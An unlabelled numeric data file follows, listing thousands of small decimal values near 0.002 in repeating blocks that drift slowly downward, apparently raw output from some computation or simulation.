0.00179159
0.00177842
0.00178065
0.00179167
0.00177834
0.0017785
0.00178963
0.00179162
0.00178063
0.00179159
0.00178065
0.00177842
0.00179167
0.00179167
0.001779
0.00177835
0.00177835
0.00174265
0.00175586
0.00175586
0.00174263
0.00175587
0.00174262
0.00174265
0.00175586
0.00175586
0.00174263
0.00175384
0.00175384
0.00175384
0.00172713
0.00172713
0.00172714
0.00172713
0.00174277
0.00175581
0.00175382
0.00174488
0.00175578
0.00174269
0.00174491
0.00175587
0.00174263
0.00174278
0.00175382
0.00175581
0.00174488
0.00175578
0.0017449
0.0017427
0.00175586
0.00175586
0.00174326
0.00174263
0.00174263
0.00170713
0.00172028
0.00172027
0.00170712
0.00172028
0.00170711
0.00170714
0.00172028
0.00172028
0.00170712
0.00171825
0.00171826
0.00171825
0.00169168
0.00169168
0.00169168
0.00169168
0.00170725
0.00172023
0.00171824
0.00170935
0.00172018
0.00170718
0.00170937
0.00172029
0.00170712
0.00170726
0.00171825
0.00172023
0.00170935
0.00172018
0.00170938
0.00170718
0.00172028
0.00172028
0.00170774
0.00170712
0.00170712
0.00167178
0.00168487
0.00168486
0.00167176
0.00168487
0.00167176
0.00167178
0.00168487
0.00168487
0.00167177
0.00168284
0.00168284
0.00168284
0.0016719
0.00168482
0.00168283
0.00167398
0.00168478
0.00167182
0.001674
0.00168488
0.00167176
0.00167191
0.00168283
0.00168483
0.00167398
0.00168479
0.001674
0.00167183
0.00168487
0.00168488
0.00167238
0.00167176
0.00167177
0.00258496
0.00257032
0.00258496
0.00257032
0.002585
0.002585
0.00257115
0.00257039
0.00257039
0.0025506
0.0025652
0.0025506
0.0025652
0.00256491
0.00255067
0.00255067
0.00256524
0.00256524
0.00257045
0.00258498
0.00257035
0.00258505
0.00257075
0.00258497
0.00258281
0.00257293
0.00257054
0.00257293
0.00258503
0.00257075
0.00258497
0.00258281
0.00257293
0.00257054
0.00257293
0.00258503
0.00256529
0.00255064
0.00256522
0.00255073
0.00256529
0.00255064
0.00256522
0.00255073
0.00256526
0.00256306
0.00255082
0.00255321
0.0025652
0.00256306
0.00255102
0.00256526
0.00256306
0.00255082
0.00255321
0.00256521
0.00256306
0.00255102
0.002585
0.002585
0.00257116
0.00257039
0.00257039
0.00258496
0.00257032
0.0025506
0.0025652
0.00256491
0.00255067
0.00255067
0.00256524
0.00256524
0.0025506
0.0025652
0.00257075
0.00258496
0.00258282
0.00257293
0.00257054
0.00257293
0.00258502
0.00257045
0.00258498
0.00257035
0.00258505
0.00257075
0.00258282
0.00258497
0.00257293
0.00257293
0.00257054
0.00258502
0.00256529
0.00255064
0.00256522
0.00255073
0.00256526
0.00256306
0.00255082
0.00255321
0.00256521
0.00256306
0.00255102
0.00256529
0.00255064
0.00256522
0.00255073
0.00256526
0.00256306
0.00255321
0.00255082
0.00256306
0.0025652
0.00255102
0.00257045
0.00258498
0.00257035
0.00258505
0.00257075
0.00258281
0.00258496
0.00257293
0.00257293
0.00257054
0.00258502
0.00257045
0.00258498
0.00257035
0.00258505
0.00256526
0.00256306
0.00255082
0.00255321
0.0025652
0.00256306
0.00255102
0.00256529
0.00255064
0.00256522
0.00255073
0.00256526
0.00256306
0.00255321
0.00255082
0.00256306
0.0025652
0.00255102
0.00256529
0.00255064
0.00256522
0.00255073
0.002585
0.002585
0.00257116
0.00257039
0.00257039
0.00258496
0.00257032
0.00255061
0.0025652
0.00256491
0.00255067
0.00255067
0.00256524
0.00256524
0.0025506
0.0025652
0.00257075
0.00258282
0.00258497
0.00257293
0.00257293
0.00257054
0.00258502
0.00257045
0.00258498
0.00257035
0.00258505
0.00257045
0.00258498
0.00257035
0.00258505
0.00256526
0.00256306
0.00255321
0.00255082
0.00256306
0.0025652
0.00255102
0.00256526
0.00256306
0.00255321
0.00255082
0.00256306
0.0025652
0.00255102
0.00256529
0.00255064
0.00256522
0.00255073
0.00256529
0.00255064
0.00256522
0.00255073
0.00258496
0.00257032
0.00258496
0.00257032
0.00256491
0.00255067
0.00255067
0.00256524
0.00256524
0.0025506
0.0025652
0.0025506
0.0025652
0.0025455
0.00253094
0.0025455
0.00253094
0.00254554
0.00254554
0.00253178
0.002531
0.002531
0.00251134
0.00252586
0.00251134
0.00252586
0.00252556
0.0025114
0.0025114
0.00252589
0.00252589
0.00253107
0.00254552
0.00254558
0.00253097
0.00253135
0.0025455
0.00254336
0.00253354
0.00254555
0.00253115
0.00253354
0.00253134
0.0025455
0.00254336
0.00253354
0.00254555
0.00253115
0.00253354
0.00252593
0.00251137
0.00252587
0.00251146
0.00252593
0.00251137
0.00252587
0.00251146
0.0025259
0.00252372
0.00251154
0.00251392
0.00252585
0.00252372
0.00251173
0.0025259
0.00252372
0.00251154
0.00251392
0.00252585
0.00252372
0.00251173
0.00254554
0.00254554
0.00253178
0.002531
0.002531
0.0025455
0.00253094
0.00251134
0.00252586
0.00252556
0.0025114
0.0025114
0.00252589
0.00252589
0.00251134
0.00252586
0.00253135
0.0025455
0.00254336
0.00253354
0.00254555
0.00253115
0.00253354
0.00253107
0.00254552
0.00254558
0.00253097
0.00253135
0.00254336
0.0025455
0.00253354
0.00254555
0.00253354
0.00253115
0.00252593
0.00251137
0.00252587
0.00251146
0.0025259
0.00252372
0.00251154
0.00251392
0.00252585
0.00252372
0.00251173
0.00252593
0.00251137
0.00252587
0.00251146
0.0025259
0.00252372
0.00251392
0.00251154
0.00252372
0.00252585
0.00251173
0.00253107
0.00254552
0.00254558
0.00253097
0.00253135
0.00254336
0.0025455
0.00253354
0.00254555
0.00253354
0.00253115
0.00253107
0.00254552
0.00254558
0.00253097
0.0025259
0.00252373
0.00251154
0.00251393
0.00252585
0.00252372
0.00251173
0.00252593
0.00251137
0.00252587
0.00251146
0.0025259
0.00252372
0.00251393
0.00251154
0.00252372
0.00252585
0.00251173
0.00252593
0.00251137
0.00252587
0.00251146
0.00254554
0.00254554
0.00253178
0.002531
0.002531
0.0025455
0.00253094
0.00251134
0.00252586
0.00252556
0.0025114
0.00251139
0.00252589
0.00252589
0.00251134
0.00252586
0.00253134
0.00254336
0.0025455
0.00253354
0.00254555
0.00253354
0.00253115
0.00253107
0.00254552
0.00254558
0.00253097
0.00253107
0.00254552
0.00254558
0.00253097
0.0025259
0.00252372
0.00251392
0.00251154
0.00252372
0.00252585
0.00251173
0.0025259
0.00252372
0.00251392
0.00251154
0.00252372
0.00252585
0.00251173
0.00252593
0.00251137
0.00252587
0.00251146
0.00252593
0.00251137
0.00252587
0.00251146
0.0025455
0.00253094
0.0025455
0.00253094
0.00252556
0.0025114
0.0025114
0.00252589
0.00252589
0.00251134
0.00252586
0.00251134
0.00252586
0.00250627
0.00249179
0.00250627
0.00249179
0.0025063
0.0025063
0.00249263
0.00249184
0.00249184
0.00247229
0.00248673
0.00247229
0.00248673
0.00248643
0.00247234
0.00247234
0.00248676
0.00248676
0.0024919
0.00250628
0.00250634
0.00249181
0.00249216
0.00250626
0.00250414
0.00249437
0.0025063
0.00249198
0.00249437
0.00249216
0.00250626
0.00250414
0.00249437
0.0025063
0.00249199
0.00249437
0.0024868
0.00247231
0.00248675
0.0024724
0.0024868
0.00247231
0.00248675
0.0024724
0.00248676
0.00248461
0.00247248
0.00247486
0.00248672
0.00248461
0.00247265
0.00248676
0.00248461
0.00247248
0.00247486
0.00248672
0.00248461
0.00247265
0.0025063
0.0025063
0.00249263
0.00249184
0.00249184
0.00250627
0.00249179
0.00247229
0.00248673
0.00248643
0.00247234
0.00247234
0.00248676
0.00248676
0.00247229
0.00248673
0.00249217
0.00250626
0.00250414
0.00249437
0.0025063
0.00249198
0.00249437
0.0024919
0.00250628
0.00250634
0.00249181
0.00249216
0.00250414
0.00250626
0.00249437
0.0025063
0.00249437
0.00249199
0.0024868
0.00247231
0.00248674
0.0024724
0.00248676
0.00248461
0.00247248
0.00247486
0.00248672
0.00248461
0.00247266
0.0024868
0.00247231
0.00248675
0.0024724
0.00248676
0.00248461
0.00247486
0.00247248
0.00248461
0.00248672
0.00247266
0.0024919
0.00250628
0.00250634
0.00249181
0.00249217
0.00250414
0.00250626
0.00249437
0.0025063
0.00249437
0.00249198
0.0024919
0.00250628
0.00250634
0.00249181
0.00248676
0.00248461
0.00247248
0.00247486
0.00248672
0.00248461
0.00247266
0.0024868
0.00247231
0.00248674
0.0024724
0.00248676
0.00248461
0.00247486
0.00247248
0.00248461
0.00248672
0.00247266
0.0024868
0.00247231
0.00248675
0.0024724
0.0025063
0.0025063
0.00249263
0.00249184
0.00249184
0.00250627
0.00249179
0.00247229
0.00248673
0.00248643
0.00247234
0.00247234
0.00248676
0.00248676
0.00247229
0.00248673
0.00249216
0.00250414
0.00250626
0.00249437
0.0025063
0.00249437
0.00249198
0.0024919
0.00250628
0.00250634
0.00249181
0.0024919
0.00250628
0.00250634
0.00249181
0.00248676
0.00248461
0.00247486
0.00247248
0.00248461
0.00248672
0.00247265
0.00248676
0.00248461
0.00247486
0.00247248
0.00248461
0.00248672
0.00247265
0.0024868
0.00247231
0.00248674
0.0024724
0.0024868
0.00247231
0.00248674
0.0024724
0.00250627
0.00249179
0.00250627
0.00249179
0.00248643
0.00247234
0.00247234
0.00248676
0.00248676
0.00247229
0.00248673
0.00247229
0.00248673
0.00246725
0.00245284
0.00246725
0.00245284
0.00246728
0.00246728
0.00245368
0.00245289
0.00245289
0.00243344
0.00244782
0.00243344
0.00244781
0.00244751
0.00243349
0.00243349
0.00244784
0.00244784
0.00245295
0.00246726
0.00246732
0.00245287
0.0024532
0.00246723
0.00246513
0.00245541
0.00246727
0.00245302
0.00245541
0.0024532
0.00246724
0.00246513
0.00245541
0.00246727
0.00245302
0.00245541
0.00244788
0.00243347
0.00244783
0.00243355
0.00244788
0.00243347
0.00244783
0.00243355
0.00244783
0.0024457
0.00243362
0.00243601
0.0024478
0.0024457
0.00243379
0.00244783
0.0024457
0.00243362
0.00243601
0.0024478
0.0024457
0.00243379
0.00246728
0.00246728
0.00245368
0.00245289
0.00245289
0.00246725
0.00245284
0.00243345
0.00244782
0.00244751
0.00243349
0.00243349
0.00244785
0.00244784
0.00243344
0.00244782
0.0024532
0.00246724
0.00246513
0.00245541
0.00246727
0.00245302
0.00245541
0.00245295
0.00246726
0.00246732
0.00245287
0.0024532
0.00246513
0.00246723
0.00245541
0.00246727
0.00245541
0.00245302
0.00244788
0.00243347
0.00244783
0.00243355
0.00244783
0.0024457
0.00243362
0.00243601
0.0024478
0.0024457
0.00243379
0.00244788
0.00243347
0.00244783
0.00243355
0.00244783
0.0024457
0.00243601
0.00243362
0.0024457
0.0024478
0.00243379
0.00245295
0.00246726
0.00246732
0.00245287
0.0024532
0.00246513
0.00246724
0.00245541
0.00246727
0.00245541
0.00245302
0.00245295
0.00246726
0.00246732
0.00245287
0.00244783
0.0024457
0.00243362
0.00243601
0.0024478
0.0024457
0.00243379
0.00244788
0.00243347
0.00244783
0.00243355
0.00244783
0.0024457
0.00243601
0.00243362
0.0024457
0.0024478
0.00243379
0.00244788
0.00243347
0.00244783
0.00243355
0.00246728
0.00246728
0.00245368
0.00245289
0.00245289
0.00246725
0.00245284
0.00243344
0.00244782
0.00244751
0.00243349
0.00243349
0.00244784
0.00244784
0.00243344
0.00244781
0.0024532
0.00246513
0.00246723
0.00245541
0.00246727
0.00245541
0.00245302
0.00245295
0.00246726
0.00246732
0.00245287
0.00245295
0.00246726
0.00246731
0.00245286
0.00244783
0.0024457
0.00243601
0.00243362
0.0024457
0.0024478
0.00243379
0.00244783
0.0024457
0.00243601
0.00243362
0.0024457
0.0024478
0.00243379
0.00244788
0.00243347
0.00244783
0.00243355
0.00244788
0.00243347
0.00244783
0.00243355
0.00246725
0.00245284
0.00246725
0.00245284
0.00244751
0.00243349
0.00243349
0.00244784
0.00244784
0.00243344
0.00244781
0.00243344
0.00244781
0.00242843
0.0024141
0.00242843
0.0024141
0.00242846
0.00242846
0.00241494
0.00241414
0.00241414
0.0023948
0.0024091
0.0023948
0.0024091
0.00240879
0.00239484
0.00239484
0.00240913
0.00240913
0.0024142
0.00242845
0.0024285
0.00241412
0.00241444
0.00242842
0.00242633
0.00241665
0.00242844
0.00241427
0.00241666
0.00241444
0.00242842
0.00242633
0.00241665
0.00242844
0.00241427
0.00241666
0.00240916
0.00239483
0.00240911
0.0023949
0.00240916
0.00239483
0.00240911
0.0023949
0.0024091
0.002407
0.00239496
0.00239735
0.00240908
0.002407
0.00239513
0.00240911
0.002407
0.00239497
0.00239735
0.00240908
0.002407
0.00239513
0.00242846
0.00242846
0.00241494
0.00241414
0.00241414
0.00242843
0.0024141
0.0023948
0.0024091
0.00240879
0.00239485
0.00239484
0.00240913
0.00240913
0.0023948
0.0024091
0.00241444
0.00242842
0.00242632
0.00241665
0.00242844
0.00241427
0.00241666
0.0024142
0.00242845
0.00242849
0.00241412
0.00241444
0.00242632
0.00242842
0.00241665
0.00242844
0.00241666
0.00241427
0.00240916
0.00239482
0.00240911
0.0023949
0.00240911
0.002407
0.00239496
0.00239735
0.00240908
0.002407
0.00239513
0.00240916
0.00239483
0.00240911
0.0023949
0.00240911
0.002407
0.00239735
0.00239497
0.002407
0.00240908
0.00239513
0.0024142
0.00242845
0.00242849
0.00241412
0.00241444
0.00242632
0.00242842
0.00241665
0.00242844
0.00241665
0.00241427
0.0024142
0.00242845
0.00242849
0.00241412
0.00240911
0.002407
0.00239496
0.00239735
0.00240908
0.002407
0.00239513
0.00240916
0.00239482
0.00240911
0.0023949
0.00240911
0.002407
0.00239735
0.00239496
0.002407
0.00240908
0.00239513
0.00240916
0.00239482
0.00240911
0.0023949
0.00242846
0.00242846
0.00241494
0.00241414
0.00241414
0.00242843
0.0024141
0.0023948
0.0024091
0.00240879
0.00239485
0.00239484
0.00240913
0.00240913
0.0023948
0.0024091
0.00241444
0.00242632
0.00242842
0.00241665
0.00242844
0.00241666
0.00241426
0.0024142
0.00242845
0.00242849
0.00241412
0.0024142
0.00242844
0.00242849
0.00241412
0.0024091
0.002407
0.00239735
0.00239496
0.002407
0.00240908
0.00239513
0.0024091
0.002407
0.00239735
0.00239496
0.002407
0.00240908
0.00239513
0.00240916
0.00239482
0.00240911
0.0023949
0.00240916
0.00239482
0.00240911
0.0023949
0.00242843
0.0024141
0.00242843
0.0024141
0.00240879
0.00239484
0.00239484
0.00240913
0.00240913
0.0023948
0.0024091
0.0023948
0.0024091
0.00238982
0.00237555
0.00238982
0.00237555
0.00238984
0.00238984
0.00237639
0.00237559
0.00237559
0.00235635
0.00237058
0.00235635
0.00237058
0.00237027
0.00235639
0.00235639
0.00237061
0.00237061
0.00237565
0.00238983
0.00238987
0.00237557
0.00237588
0.0023898
0.00238772
0.0023781
0.00238982
0.00237571
0.0023781
0.00237588
0.0023898
0.00238772
0.0023781
0.00238982
0.00237571
0.0023781
0.00237064
0.00235637
0.00237059
0.00235644
0.00237064
0.00235637
0.00237059
0.00235644
0.00237058
0.00236849
0.0023565
0.00235889
0.00237056
0.00236849
0.00235667
0.00237058
0.00236849
0.0023565
0.00235889
0.00237056
0.00236849
0.00235667
0.00238984
0.00238984
0.00237639
0.00237559
0.00237559
0.00238982
0.00237555
0.00235635
0.00237058
0.00237026
0.00235639
0.00235639
0.00237061
0.00237061
0.00235635
0.00237058
0.00237588
0.0023898
0.00238772
0.0023781
0.00238982
0.00237571
0.0023781
0.00237565
0.00238983
0.00238987
0.00237558
0.00237588
0.00238772
0.0023898
0.0023781
0.00238982
0.0023781
0.00237571
0.00237064
0.00235637
0.00237059
0.00235644
0.00237058
0.00236849
0.0023565
0.00235889
0.00237056
0.00236849
0.00235667
0.00237064
0.00235637
0.00237059
0.00235644
0.00237058
0.00236849
0.00235889
0.0023565
0.00236849
0.00237056
0.00235667
0.00237565
0.00238983
0.00238987
0.00237557
0.00237587
0.00238772
0.0023898
0.0023781
0.00238982
0.0023781
0.00237571
0.00237565
0.00238983
0.00238987
0.00237557
0.00237058
0.00236849
0.0023565
0.00235889
0.00237056
0.00236849
0.00235667
0.00237064
0.00235637
0.00237059
0.00235644
0.00237058
0.00236849
0.00235889
0.0023565
0.00236849
0.00237056
0.00235667
0.00237064
0.00235637
0.00237059
0.00235644
0.00238984
0.00238984
0.00237639
0.00237559
0.00237559
0.00238982
0.00237555
0.00235635
0.00237058
0.00237027
0.00235639
0.00235639
0.00237061
0.00237061
0.00235635
0.00237058
0.00237588
0.00238772
0.0023898
0.0023781
0.00238982
0.0023781
0.00237571
0.00237565
0.00238983
0.00238987
0.00237557
0.00237565
0.00238983
0.00238987
0.00237557
0.00237058
0.00236849
0.00235889
0.0023565
0.00236849
0.00237056
0.00235667
0.00237058
0.00236849
0.00235889
0.0023565
0.00236849
0.00237056
0.00235667
0.00237064
0.00235637
0.00237059
0.00235644
0.00237064
0.00235637
0.00237059
0.00235644
0.00238982
0.00237555
0.00238982
0.00237555
0.00237027
0.00235639
0.00235639
0.00237061
0.00237061
0.00235635
0.00237058
0.00235635
0.00237058
0.00235139
0.00233719
0.00235139
0.00233719
0.00235142
0.00235142
0.00233803
0.00233723
0.00233723
0.00231808
0.00233225
0.00231808
0.00233225
0.00233193
0.00231812
0.00231812
0.00233227
0.00233227
0.00233728
0.0023514
0.00235145
0.00233721
0.00233751
0.00235137
0.00234931
0.00233973
0.00235139
0.00233734
0.00233973
0.0023375
0.00235137
0.00234931
0.00233973
0.00235139
0.00233734
0.00233973
0.0023323
0.0023181
0.00233226
0.00231817
0.0023323
0.0023181
0.00233226
0.00231817
0.00233224
0.00233016
0.00231823
0.00232061
0.00233223
0.00233017
0.00231838
0.00233224
0.00233016
0.00231823
0.00232062
0.00233223
0.00233017
0.00231838
0.00235142
0.00235142
0.00233803
0.00233723
0.00233723
0.00235139
0.00233719
0.00231808
0.00233225
0.00233193
0.00231812
0.00231812
0.00233227
0.00233227
0.00231808
0.00233225
0.00233751
0.00235137
0.00234931
0.00233973
0.00235139
0.00233734
0.00233973
0.00233728
0.0023514
0.00235145
0.00233722
0.00233751
0.00234931
0.00235137
0.00233973
0.00235139
0.00233973
0.00233734
0.0023323
0.0023181
0.00233226
0.00231817
0.00233224
0.00233016
0.00231823
0.00232062
0.00233223
0.00233017
0.00231838
0.0023323
0.0023181
0.00233226
0.00231817
0.00233224
0.00233016
0.00232062
0.00231823
0.00233017
0.00233223
0.00231838
0.00233728
0.0023514
0.00235144
0.00233721
0.0023375
0.00234931
0.00235137
0.00233973
0.00235138
0.00233973
0.00233734
0.00233728
0.0023514
0.00235144
0.00233721
0.00233224
0.00233016
0.00231823
0.00232062
0.00233223
0.00233017
0.00231838
0.0023323
0.0023181
0.00233226
0.00231817
0.00233224
0.00233016
0.00232062
0.00231823
0.00233017
0.00233223
0.00231838
0.0023323
0.0023181
0.00233226
0.00231817
0.00235142
0.00235142
0.00233803
0.00233723
0.00233723
0.00235139
0.00233719
0.00231808
0.00233225
0.00233193
0.00231812
0.00231812
0.00233227
0.00233227
0.00231808
0.00233225
0.0023375
0.00234931
0.00235137
0.00233973
0.00235139
0.00233973
0.00233734
0.00233728
0.0023514
0.00235145
0.00233721
0.00233728
0.0023514
0.00235145
0.00233721
0.00233224
0.00233016
0.00232062
0.00231823
0.00233017
0.00233223
0.00231838
0.00233224
0.00233016
0.00232061
0.00231823
0.00233017
0.00233223
0.00231838
0.0023323
0.0023181
0.00233226
0.00231817
0.0023323
0.0023181
0.00233226
0.00231817
0.00235139
0.00233719
0.00235139
0.00233719
0.00233192
0.00231812
0.00231812
0.00233227
0.00233227
0.00231808
0.00233225
0.00231808
0.00233225
0.00231315
0.00229901
0.00231315
0.00229901
0.00231317
0.00231317
0.00229984
0.00229905
0.00229905
0.00227999
0.0022941
0.00227999
0.0022941
0.00229376
0.00228002
0.00228002
0.00229412
0.00229412
0.0022991
0.00231316
0.0023132
0.00229903
0.00229931
0.00231313
0.00231107
0.00230154
0.00231314
0.00229916
0.00230154
0.00229931
0.00231313
0.00231107
0.00230154
0.00231314
0.00229916
0.00230154
0.00229414
0.00228001
0.0022941
0.00228007
0.00229414
0.00228001
0.0022941
0.00228007
0.00229408
0.00229202
0.00228013
0.00228251
0.00229407
0.00229202
0.00228028
0.00229408
0.00229202
0.00228013
0.00228251
0.00229407
0.00229202
0.00228028
0.00231317
0.00231317
0.00229984
0.00229905
0.00229905
0.00231315
0.00229901
0.00227999
0.0022941
0.00229376
0.00228002
0.00228002
0.00229412
0.00229412
0.00227999
0.0022941
0.00229931
0.00231313
0.00231107
0.00230154
0.00231314
0.00229916
0.00230154
0.0022991
0.00231316
0.0023132
0.00229903
0.00229931
0.00231107
0.00231313
0.00230154
0.00231314
0.00230154
0.00229916
0.00229414
0.00228001
0.0022941
0.00228007
0.00229408
0.00229202
0.00228013
0.00228251
0.00229407
0.00229202
0.00228028
0.00229414
0.00228001
0.0022941
0.00228007
0.00229408
0.00229202
0.00228251
0.00228013
0.00229202
0.00229407
0.00228028
0.0022991
0.00231316
0.0023132
0.00229903
0.00229931
0.00231107
0.00231313
0.00230154
0.00231314
0.00230154
0.00229915
0.0022991
0.00231316
0.0023132
0.00229903
0.00229408
0.00229202
0.00228013
0.00228251
0.00229407
0.00229202
0.00228028
0.00229414
0.00228001
0.0022941
0.00228007
0.00229408
0.00229202
0.00228251
0.00228013
0.00229202
0.00229407
0.00228028
0.00229414
0.00228001
0.0022941
0.00228007
0.00231317
0.00231317
0.00229984
0.00229905
0.00229905
0.00231315
0.00229901
0.00227999
0.0022941
0.00229376
0.00228002
0.00228002
0.00229412
0.00229412
0.00227999
0.0022941
0.00229931
0.00231107
0.00231313
0.00230154
0.00231314
0.00230154
0.00229916
0.0022991
0.00231316
0.0023132
0.00229903
0.0022991
0.00231316
0.0023132
0.00229903
0.00229408
0.00229202
0.00228251
0.00228013
0.00229202
0.00229407
0.00228028
0.00229408
0.00229202
0.00228251
0.00228013
0.00229202
0.00229407
0.00228028
0.00229414
0.00228001
0.0022941
0.00228007
0.00229414
0.00228001
0.0022941
0.00228007
0.00231315
0.00229901
0.00231315
0.00229901
0.00229376
0.00228002
0.00228002
0.00229412
0.00229412
0.00227999
0.00229409
0.00227999
0.0022941
0.00227508
0.002261
0.00227508
0.002261
0.0022751
0.0022751
0.00226182
0.00226104
0.00226104
0.00224205
0.00225611
0.00224205
0.00225611
0.00225576
0.00224209
0.00224209
0.00225613
0.00225613
0.00226108
0.00227509
0.00227513
0.00226102
0.00226129
0.00227506
0.00227301
0.00226351
0.00227506
0.00226114
0.00226352
0.00226129
0.00227506
0.00227301
0.00226351
0.00227506
0.00226114
0.00226352
0.00225615
0.00224207
0.00225611
0.00224213
0.00225615
0.00224207
0.00225611
0.00224213
0.00225608
0.00225403
0.00224219
0.00224457
0.00225608
0.00225404
0.00224233
0.00225609
0.00225403
0.00224219
0.00224457
0.00225608
0.00225404
0.00224233
0.0022751
0.0022751
0.00226182
0.00226104
0.00226104
0.00227508
0.002261
0.00224205
0.00225611
0.00225576
0.00224209
0.00224209
0.00225613
0.00225613
0.00224205
0.00225611
0.00226129
0.00227506
0.00227301
0.00226351
0.00227506
0.00226114
0.00226352
0.00226108
0.00227509
0.00227513
0.00226102
0.00226129
0.00227301
0.00227506
0.00226351
0.00227506
0.00226352
0.00226114
0.00225615
0.00224207
0.00225611
0.00224213
0.00225608
0.00225403
0.00224219
0.00224457
0.00225608
0.00225404
0.00224233
0.00225615
0.00224207
0.00225611
0.00224213
0.00225608
0.00225403
0.00224457
0.00224219
0.00225404
0.00225608
0.00224233
0.00226108
0.00227509
0.00227513
0.00226102
0.00226129
0.00227301
0.00227506
0.00226351
0.00227506
0.00226352
0.00226114
0.00226108
0.00227509
0.00227513
0.00226102
0.00225608
0.00225403
0.00224219
0.00224457
0.00225608
0.00225404
0.00224233
0.00225615
0.00224207
0.00225611
0.00224213
0.00225608
0.00225403
0.00224457
0.00224219
0.00225404
0.00225608
0.00224233
0.00225615
0.00224207
0.00225611
0.00224213
0.0022751
0.0022751
0.00226182
0.00226104
0.00226104
0.00227508
0.002261
0.00224205
0.00225611
0.00225576
0.00224209
0.00224209
0.00225613
0.00225613
0.00224205
0.00225611
0.00226128
0.00227301
0.00227505
0.00226351
0.00227506
0.00226352
0.00226114
0.00226108
0.00227509
0.00227513
0.00226102
0.00226108
0.00227509
0.00227513
0.00226102
0.00225608
0.00225403
0.00224457
0.00224219
0.00225404
0.00225608
0.00224233
0.00225608
0.00225403
0.00224457
0.00224219
0.00225404
0.00225608
0.00224233
0.00225615
0.00224207
0.00225611
0.00224213
0.00225615
0.00224207
0.00225611
0.00224213
0.00227508
0.002261
0.00227508
0.002261
0.00225576
0.00224209
0.00224209
0.00225613
0.00225613
0.00224205
0.00225611
0.00224205
0.00225611
0.00223717
0.00222314
0.00223717
0.00222314
0.00223719
0.00223719
0.00222395
0.00222318
0.00222317
0.00220427
0.00221827
0.00220427
0.00221827
0.00221791
0.0022043
0.0022043
0.00221829
0.00221829
0.00222322
0.00223718
0.00223721
0.00222316
0.00222342
0.00223714
0.00223511
0.00222565
0.00223715
0.00222327
0.00222566
0.00222342
0.00223714
0.00223511
0.00222565
0.00223714
0.00222327
0.00222566
0.00221831
0.00220428
0.00221827
0.00220434
0.00221831
0.00220428
0.00221827
0.00220434
0.00221824
0.0022162
0.00220439
0.00220677
0.00221824
0.00221621
0.00220453
0.00221824
0.0022162
0.00220439
0.00220677
0.00221824
0.00221621
0.00220453
0.00223719
0.00223719
0.00222395
0.00222317
0.00222318
0.00223717
0.00222314
0.00220427
0.00221827
0.00221791
0.0022043
0.0022043
0.00221829
0.00221829
0.00220427
0.00221827
0.00222342
0.00223714
0.00223511
0.00222565
0.00223715
0.00222327
0.00222565
0.00222322
0.00223718
0.00223721
0.00222316
0.00222342
0.00223511
0.00223714
0.00222565
0.00223714
0.00222565
0.00222327
0.00221831
0.00220428
0.00221827
0.00220434
0.00221824
0.0022162
0.00220439
0.00220678
0.00221824
0.00221621
0.00220453
0.00221831
0.00220428
0.00221827
0.00220434
0.00221824
0.0022162
0.00220677
0.0022044
0.00221621
0.00221824
0.00220453
0.00222322
0.00223718
0.00223721
0.00222316
0.00222342
0.00223511
0.00223714
0.00222565
0.00223715
0.00222566
0.00222327
0.00222322
0.00223717
0.00223721
0.00222316
0.00221824
0.0022162
0.00220439
0.00220677
0.00221824
0.00221621
0.00220453
0.00221831
0.00220428
0.00221827
0.00220434
0.00221824
0.0022162
0.00220677
0.00220439
0.00221621
0.00221824
0.00220453
0.00221831
0.00220428
0.00221827
0.00220434
0.00223719
0.00223719
0.00222395
0.00222318
0.00222317
0.00223717
0.00222314
0.00220427
0.00221827
0.00221792
0.0022043
0.0022043
0.00221829
0.00221829
0.00220427
0.00221827
0.00222342
0.00223511
0.00223714
0.00222565
0.00223714
0.00222565
0.00222327
0.00222322
0.00223718
0.00223721
0.00222316
0.00222322
0.00223718
0.00223721
0.00222316
0.00221824
0.0022162
0.00220677
0.00220439
0.00221621
0.00221824
0.00220453
0.00221824
0.0022162
0.00220677
0.00220439
0.00221621
0.00221824
0.00220453
0.00221831
0.00220428
0.00221827
0.00220434
0.00221831
0.00220428
0.00221827
0.00220434
0.00223717
0.00222314
0.00223717
0.00222314
0.00221791
0.0022043
0.0022043
0.00221829
0.00221829
0.00220427
0.00221827
0.00220427
0.00221827
0.0021994
0.00218542
0.0021994
0.00218542
0.00219942
0.00219942
0.00218622
0.00218545
0.00218545
0.0021666
0.00218056
0.0021666
0.00218056
0.0021802
0.00216663
0.00216663
0.00218058
0.00218058
0.00218549
0.00219941
0.00219944
0.00218544
0.00218568
0.00219937
0.00219735
0.00218791
0.00219937
0.00218555
0.00218792
0.00218569
0.00219937
0.00219735
0.00218791
0.00219937
0.00218555
0.00218792
0.0021806
0.00216662
0.00218057
0.00216668
0.0021806
0.00216662
0.00218057
0.00216668
0.00218053
0.0021785
0.00216673
0.0021691
0.00218054
0.00217851
0.00216686
0.00218053
0.0021785
0.00216673
0.0021691
0.00218054
0.00217851
0.00216686
0.00219942
0.00219942
0.00218622
0.00218545
0.00218545
0.0021994
0.00218542
0.0021666
0.00218056
0.0021802
0.00216663
0.00216663
0.00218058
0.00218058
0.0021666
0.00218056
0.00218569
0.00219937
0.00219735
0.00218791
0.00219937
0.00218555
0.00218792
0.00218549
0.00219941
0.00219944
0.00218544
0.00218569
0.00219735
0.00219937
0.00218791
0.00219937
0.00218792
0.00218555
0.0021806
0.00216662
0.00218057
0.00216668
0.00218054
0.0021785
0.00216673
0.0021691
0.00218054
0.00217851
0.00216686
0.0021806
0.00216662
0.00218057
0.00216668
0.00218054
0.0021785
0.0021691
0.00216673
0.00217851
0.00218054
0.00216686
0.00218549
0.00219941
0.00219944
0.00218544
0.00218569
0.00219735
0.00219937
0.00218791
0.00219937
0.00218792
0.00218555
0.00218549
0.00219941
0.00219944
0.00218544
0.00218053
0.0021785
0.00216673
0.0021691
0.00218054
0.00217851
0.00216686
0.0021806
0.00216662
0.00218057
0.00216668
0.00218054
0.0021785
0.0021691
0.00216673
0.00217851
0.00218054
0.00216686
0.0021806
0.00216662
0.00218057
0.00216668
0.00219942
0.00219942
0.00218622
0.00218545
0.00218545
0.0021994
0.00218542
0.0021666
0.00218056
0.0021802
0.00216663
0.00216663
0.00218058
0.00218058
0.0021666
0.00218056
0.00218568
0.00219735
0.00219937
0.00218791
0.00219937
0.00218792
0.00218555
0.00218549
0.00219941
0.00219944
0.00218544
0.00218549
0.00219941
0.00219944
0.00218544
0.00218054
0.0021785
0.00216911
0.00216673
0.00217851
0.00218054
0.00216686
0.00218054
0.0021785
0.0021691
0.00216673
0.00217851
0.00218054
0.00216686
0.0021806
0.00216662
0.00218057
0.00216668
0.0021806
0.00216662
0.00218057
0.00216668
0.0021994
0.00218542
0.0021994
0.00218542
0.0021802
